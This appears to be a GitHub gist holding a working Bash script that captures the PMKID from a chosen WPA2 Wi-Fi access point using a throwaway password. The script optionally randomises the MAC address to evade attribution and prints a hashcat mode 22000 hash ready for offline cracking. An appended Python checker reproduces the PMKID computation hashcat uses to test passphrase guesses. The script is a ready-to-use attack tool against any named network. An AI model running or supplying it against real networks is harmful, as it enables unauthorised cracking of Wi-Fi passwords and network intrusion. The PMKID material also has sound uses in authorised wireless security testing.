@drygdryg
Last active August 7, 2025 04:58
Simple Bash script to capture the PMKID from a WPA-protected Wi-Fi access point using only wpa_supplicant, without switching the card to monitor mode. The AP sends the PMKID in message 1 of the 4-way handshake, before the passphrase is verified, so a throwaway password is enough to obtain it.
#!/bin/bash
# Capture the PMKID an access point sends in message 1 of the WPA2 4-way
# handshake. The AP sends it before the passphrase is verified, so a
# throwaway password is enough and no monitor mode is needed.
set -e

help() {
    cat << EOF
Usage: $0 [-r|--randomize-macaddr] <wlan interface> <AP ESSID>
Capture PMKID value from a WPA-protected Wi-Fi access point.
Requires root, wpa_supplicant, wpa_passphrase, xxd and GNU coreutils (timeout).
Options:
  -r, --randomize-macaddr  Randomize MAC address of the WLAN interface before capture (GNU macchanger is required)
  -h, --help               Show this help message
Example:
  $0 wlan0 MyWiFi
EOF
}

# Give up if the AP has not sent a PMKID after this many seconds.
CAPTURE_TIMEOUT=60

do_randomize_macaddr=0
if [ "$1" = '-r' ] || [ "$1" = '--randomize-macaddr' ]; then
    do_randomize_macaddr=1
    shift
elif [ "$1" = '-h' ] || [ "$1" = '--help' ]; then
    help
    exit 0
fi
if [ $# -lt 2 ]; then
    echo "Error: two positional arguments (interface and ESSID) are required." >&2
    help >&2
    exit 1
fi

IFACE=$1
ESSID="$2"
# hashcat wants the ESSID as lowercase hex on a single line; xxd -p wraps at
# 30 bytes by default, so raise the column width to cover the 32-byte maximum.
ESSID_HEX=$(printf '%s' "$ESSID" | xxd -p -c 32)
# Random 8-character passphrase (the WPA minimum). The AP never checks it
# before the PMKID arrives, so any syntactically valid value works.
PASSWORD=$(tr -dc 'A-Za-z0-9' < /dev/urandom | head -c 8)
ORIGINAL_MACADDR=$(cat "/sys/class/net/$IFACE/address")

if [ "$do_randomize_macaddr" -eq 1 ]; then
    echo "Randomizing MAC address..."
    ip link set "$IFACE" down
    macchanger -r "$IFACE"
    # Restore the original MAC on every exit path, including failures under set -e.
    trap "echo 'Restoring MAC address...'; ip link set $IFACE down; macchanger --mac=$ORIGINAL_MACADDR $IFACE" EXIT
fi

echo "Initiating connection with access point '$ESSID' with password '$PASSWORD'..."
MAC_CLIENT=$(tr -d ':' < "/sys/class/net/$IFACE/address")
# Feed a minimal config to wpa_supplicant and watch its debug output (-dd).
# sed prints every "selected BSS" line (association may be retried, so the
# last one is the BSS that answered) and quits at the first PMKID line, after
# which wpa_supplicant dies on SIGPIPE. timeout ends the attempt if no PMKID
# ever arrives; without it the pipeline would block forever.
wpas_output=$(wpa_passphrase "$ESSID" "$PASSWORD" \
    | timeout "$CAPTURE_TIMEOUT" wpa_supplicant -i "$IFACE" -dd -c /dev/stdin \
    | sed -n -e '/selected BSS/p' -e '/PMKID from/{p;q}' || true)
MAC_AP=$(echo "$wpas_output" | grep 'selected BSS' | tail -n 1 \
    | grep -Eo -m 1 '([0-9a-f]{2}:){5}[0-9a-f]{2}' || true)
PMKID=$(echo "$wpas_output" | grep 'PMKID from' \
    | grep -Eo -m 1 '([0-9a-f]{2} ){15}[0-9a-f]{2}' | tr -d ' ' || true)

if [ -z "$MAC_AP" ] || [ -z "$PMKID" ]; then
    echo "Failed to capture PMKID. This AP probably does not emit a PMKID." >&2
    exit 1
fi
echo "Captured PMKID from $MAC_AP ('$ESSID'): $PMKID"
echo "Hashcat 22000 mode hash:"
# Field layout: WPA*TYPE*PMKID*MAC_AP*MAC_STA*ESSID_HEX*ANONCE*EAPOL*MESSAGEPAIR.
# Type 01 is a PMKID entry, so ANONCE and EAPOL are left empty.
echo "WPA*01*$PMKID*${MAC_AP//:/}*$MAC_CLIENT*$ESSID_HEX***01"
echo
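Added example, not part of the gist: a small Python checker for the 22000 line the script prints. It recomputes PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes) and PMKID = HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA) truncated to 16 bytes, which is the test hashcat performs for every candidate, so you can confirm a capture from an AP you own against its real passphrase before spending cracking time on it. The ESSID "MyWiFi" is taken from the script's usage example; the MAC addresses and passphrase are constructed sample values, not a real capture.

```python
#!/usr/bin/env python3
"""Check a hashcat 22000 PMKID line against a candidate passphrase.

Added example, not part of the gist. The sample ESSID, MACs and
passphrase below are constructed; "MyWiFi" is the ESSID from the
script's usage example.
"""
import hashlib
import hmac

# Constructed sample input (not a real capture).
SAMPLE_ESSID = b"MyWiFi"
SAMPLE_MAC_AP = bytes.fromhex("001122334455")
SAMPLE_MAC_STA = bytes.fromhex("66778899aabb")
SAMPLE_PASSPHRASE = "correct horse battery"


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = first 128 bits of HMAC-SHA1(PMK, "PMK Name" || AA || SPA).

    This is the value the AP places in the RSN IE of handshake message 1,
    so an offline guess only needs it, the two MACs and the ESSID.
    """
    data = b"PMK Name" + mac_ap + mac_sta
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def build_22000_line(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: bytes) -> str:
    """Emit the same line shape the script prints (type 01 = PMKID)."""
    return f"WPA*01*{pmkid.hex()}*{mac_ap.hex()}*{mac_sta.hex()}*{essid.hex()}***01"


def parse_22000_line(line: str) -> dict:
    """Split a 22000 line into its fields; accepts both '***' and '***01' endings."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError("not a hashcat 22000 line")
    if fields[1] != "01":
        raise ValueError("only PMKID (type 01) lines are handled here")
    pmkid = bytes.fromhex(fields[2])
    if len(pmkid) != 16:
        raise ValueError("PMKID must be 16 bytes")
    return {
        "pmkid": pmkid,
        "mac_ap": bytes.fromhex(fields[3]),
        "mac_sta": bytes.fromhex(fields[4]),
        "essid": bytes.fromhex(fields[5]),
    }


def verify_22000_line(line: str, passphrase: str) -> bool:
    """True if the passphrase reproduces the PMKID in the line (what hashcat tests per candidate)."""
    h = parse_22000_line(line)
    pmk = pmk_from_passphrase(passphrase, h["essid"])
    candidate = pmkid_from_pmk(pmk, h["mac_ap"], h["mac_sta"])
    return hmac.compare_digest(candidate, h["pmkid"])


def sample_line() -> str:
    """Build a 22000 line from the constructed sample, as the script would print it."""
    pmk = pmk_from_passphrase(SAMPLE_PASSPHRASE, SAMPLE_ESSID)
    pmkid = pmkid_from_pmk(pmk, SAMPLE_MAC_AP, SAMPLE_MAC_STA)
    return build_22000_line(pmkid, SAMPLE_MAC_AP, SAMPLE_MAC_STA, SAMPLE_ESSID)


if __name__ == "__main__":
    line = sample_line()
    print(line)
    print("correct passphrase:", verify_22000_line(line, SAMPLE_PASSPHRASE))
    print("wrong passphrase:  ", verify_22000_line(line, "wrong-passphrase"))
```

To check a real capture, paste the line the script prints into `verify_22000_line()` with the AP's known passphrase. The parser accepts both the script's `***01` ending and the canonical `***` ending that hcxtools emits, since both leave the ANONCE and EAPOL fields empty.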